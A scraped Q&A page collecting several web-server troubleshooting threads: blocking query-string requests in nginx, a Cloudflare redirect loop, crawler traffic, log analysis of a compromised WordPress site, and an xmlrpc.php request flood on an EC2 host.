Develop Reference

How to block in NGINX all request starting with question mark

My website is getting attacked with such request as
66.249.75.242 - - [12/Jan/2023:00:29:11 +0800] "GET /?bailiffry/1529595 HTTP/1.1" 200 57100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.115 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [12/Jan/2023:00:29:14 +0800] "GET /?Diphysite-7105-hwfLs/328609048 HTTP/1.1" 200 57097 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [12/Jan/2023:00:29:16 +0800] "GET /?hypothermal/sealant313919.html HTTP/1.1" 200 57100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.115 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [12/Jan/2023:00:29:17 +0800] "GET /?dianilid/elated357845.html HTTP/1.1" 200 57100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.115 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
I have blocked other patterns, I just wish to block this for now as I have been solving this for hours and wish a quick fix for now.
How do I block request starting with question mark?

Yes you can. See the question below
Drop unwanted connections
if (condition) ) {
return 444;
}
You Can also put a WAF (Web Application Firewall) in your front, if your request is coming for a security issue you're facing.
you can see NAXSI. It's Open-source and compatible with any nginx version.

nginx reverse proxy worked on LAN but not public

I am setting up a Nginx reverse proxy using these docker images
nginx
jwilder/docker-gen
jrcs/letsencrypt-nginx-proxy-companion
The host where these containers are located is given public IP address so that the web app can be accessed from the internet. We registered the subdomain and set the public IP address to that subdomain.
When I test the configuration, the web app worked and https also worked but from LAN only (we have local DNS server that has the subdomain paired to a local server IP address.
But when I tried accessing it from internet it gives 301 redirected too many times. And yes I saw in the Nginx log the server logged around 20s 301 redirections and then stopped.
I am still clueless about what is wrong with the configuration. I used this template https://raw.githubusercontent.com/jwilder/nginx-proxy/master/nginx.tmpl for the auto-generated configuration files with a little modification in the location part (proxy_connect_timeout, proxy_send_timeout, proxy_read_timeout, proxy_send_lowat) to make our web app not 502 gateway timeout from long processing.
Can anyone point where my configuration failed?
# fhij.abcd.co.id
upstream fhij.abcd.co.id {
## Can be connected with "nginx-proxy" network
# fhid_web_1
server 172.20.0.8:8069;
}
server {
server_name fhij.abcd.co.id;
listen 80 ;
access_log /var/log/nginx/access.log vhost;
return 301 https://$host$request_uri;
}
server {
server_name fhij.abcd.co.id;
listen 443 ssl http2 ;
access_log /var/log/nginx/access.log vhost;
ssl_session_timeout 5m;
ssl_session_cache shared:SSL:50m;
ssl_session_tickets off;
ssl_certificate /etc/nginx/certs/fhij.abcd.co.id.crt;
ssl_certificate_key /etc/nginx/certs/fhij.abcd.co.id.key;
ssl_dhparam /etc/nginx/certs/fhij.abcd.co.id.dhparam.pem;
ssl_stapling on;
ssl_stapling_verify on;
ssl_trusted_certificate /etc/nginx/certs/fhij.abcd.co.id.chain.pem;
add_header Strict-Transport-Security "max-age=31536000" always;
include /etc/nginx/vhost.d/default;
location / {
proxy_pass http://fhij.abcd.co.id;
proxy_connect_timeout 9990;
proxy_send_timeout 9990;
proxy_read_timeout 9990;
proxy_send_lowat 12000;
}
}
These are the access.log I got from accessing from internet
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:42 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:44 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:44 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:44 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:45 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:45 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:46 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:47 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:47 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:47 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:47 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
And these are from LAN
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET / HTTP/2.0" 303 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web HTTP/2.0" 303 227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web/login HTTP/2.0" 200 4383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web/content/269-ceb8fb1/web.assets_common.0.css HTTP/2.0" 499 0 "https://fhij.abcd.co.id/web/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web/content/276-771d39e/web.assets_frontend.0.css HTTP/2.0" 499 0 "https://fhij.abcd.co.id/web/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "GET /web/webclient/qweb?mods= HTTP/2.0" 304 0 "https://fhij.abcd.co.id/web/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
fhij.abcd.co.id 192.168.130.127 - - [22/Nov/2019:05:21:29 +0000] "POST /web/webclient/bootstrap_translations HTTP/2.0" 200 87 "https://fhij.abcd.co.id/web/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
Why it is so different? Nginx response to internet request was 301 and response to LAN was 303

Turned out there is a mistake in our Cloudflare DNS and WAF configuration. Modifying these configuration fixed this issue.

Strange requests to web server

I have a VPS running Nginx, which currently serves only static content.
Once I was looking at the log and noticed some strange requests:
216.244.66.239 - - [03/Jan/2019:15:04:26 +0100] "GET /en/profile/Souxy HTTP/1.1" 200 4650 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help#moz.com)"
216.244.66.239 - - [03/Jan/2019:15:04:28 +0100] "GET /en/view/8gIi2vad8Y HTTP/1.1" 200 4650 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help#moz.com)"

this is crawler. On this link is descriptin https://moz.com/help/moz-procedures/crawlers/dotbot. Maybe it is indexing your website.
You can block this requests on firewall or add file robots.txt with content
User-agent: dotbot
Disallow: /

Wordpress compromised but I do not know how

today my Wordpress site was compromised so now serve a JS script that redirect to SPAM site.
I looked inside the Apache logs to reconstruct what happened, but i can't know how to interpretate this:
xx.xx.xx.xx - - [09/Jan/2017:10:24:42 +0100] "GET /wp-login.php HTTP/1.1" 200 6111 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:42 +0100] "GET /wp-login.php HTTP/1.1" 200 6111 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:43 +0100] "GET /wp-login.php HTTP/1.1" 200 6111 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:43 +0100] "GET /wp-login.php HTTP/1.1" 200 6111 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:43 +0100] "POST /wp-login.php HTTP/1.1" 302 4 "/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:43 +0100] "POST /wp-login.php HTTP/1.1" 302 4 "/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:44 +0100] "GET /wp-admin/ HTTP/1.1" 302 4 "http://my.host.name/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:44 +0100] "GET /wp-admin/ HTTP/1.1" 200 219966 "/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:47 +0100] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 183974 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:48 +0100] "GET /wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen HTTP/1.1" 500 3427 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
xx.xx.xx.xx - - [09/Jan/2017:10:24:49 +0100] "GET /wp-admin/theme-install.php?upload HTTP/1.1" 200 161448 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
As you can see somebody has tried to login, but he can't. But after two simple GET request to "/wp-admin/" seems to be logged in and he able to modify and install new theme.
At this point I have tried to find differences between the wp-admin directory that is present on the server with the original one downloaded from the official site wordpress.org, but i didn't find any differences.
I compared all file present into wp-admin with "diff" utility and i can't find any difference. For example:
diff /var/www/html/original.wordpress/wp-admin/themes.php /var/www/html.hacked/wp-admin/themes.php didn't output any code
Could you help me to find evidence?

Looks like your exploit happened here:
/wp-admin/theme-install.php?upload
Make sure your themes and plugins are updated. That last request returned a 200 response from your webserver to the attacker, and was likely used to upload a backdoor. I'd audit the contents of /wp-content/uploads/ to see if there are any out of place PHP files (backdoor shells) in there. If so, it's possible they used that to pivot within your site, so there may be other directories containing PHP backdoors elsewhere.

Wordpress hosted on EC2 overloads the server

I have hosted a wordpress website on Amazon EC2 t2.medium server instance.
The OS is 64-bit Ubuntu 16.x.x version
The issue is that, after the server is up for about 2-3 days, the server suddenly overloads and stops responding.
I am not sure what is triggering this overload on the server.
When I stop the apache server, the load gradually decreases, and restarting the server after few minutes fixes the problem.
Here is the load info,
ubuntu#ip-172-31-18-127:~$ uptime
12:42:43 up 6 days, 49 min, 2 users, load average: 32.58, 63.91, 34.88
ubuntu#ip-172-31-18-127:~$ uptime
12:42:47 up 6 days, 49 min, 2 users, load average: 29.97, 62.85, 34.69
ubuntu#ip-172-31-18-127:~$ uptime
12:42:50 up 6 days, 49 min, 2 users, load average: 27.57, 61.80, 34.50
ubuntu#ip-172-31-18-127:~$ uptime
12:42:54 up 6 days, 49 min, 2 users, load average: 25.36, 60.78, 34.32
ubuntu#ip-172-31-18-127:~$ uptime
12:43:27 up 6 days, 49 min, 2 users, load average: 15.37, 54.97, 33.22
ubuntu#ip-172-31-18-127:~$ uptime
12:51:15 up 6 days, 57 min, 2 users, load average: 0.00, 11.38, 20.01
has anyone had the same kind of issue with wordpress on EC2? Is it triggered by some plugin or is my server configuration wrong?
Thank you in advance.
EDIT
I looked into the apache access and error logs,
access logs
191.96.249.54 - - [05/Oct/2016:07:56:10 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:06 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:09 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.53 - - [05/Oct/2016:07:56:05 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:02 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:03 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.53 - - [05/Oct/2016:07:56:07 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
52.58.212.131 - - [05/Oct/2016:07:56:35 +0000] "POST /wp-cron.php?doing_wp_cron=1475.3754720687866210937500 HTTP/1.1" 200 166 "http://52.58.212.131/wp-cron.php?doing_wp_cron=1475.3754720687866210937500" "WordPress/4.6.1; http://52.58.212.131"
191.96.249.54 - - [05/Oct/2016:07:56:06 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:03 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.54 - - [05/Oct/2016:07:56:15 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
191.96.249.53 - - [05/Oct/2016:07:56:11 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
error logs
[Wed Oct 05 06:25:27.206451 2016] [mpm_prefork:notice] [pid 27426] AH00163: Apache/2.4.18 (Ubuntu) configured -- resuming normal operations
[Wed Oct 05 06:25:27.206490 2016] [core:notice] [pid 27426] AH00094: Command line: '/usr/sbin/apache2'
*** Error in `/usr/sbin/apache2': double free or corruption (!prev): 0x00005629347d6910 ***
[Wed Oct 05 07:57:13.804332 2016] [core:notice] [pid 27426] AH00051: child pid 11014 exit signal Segmentation fault (11), possible coredump in /etc/apache2
[Wed Oct 05 07:57:14.806735 2016] [mpm_prefork:notice] [pid 27426] AH00169: caught SIGTERM, shutting down
I suppose this is where the server is overloading, and apache stops responding.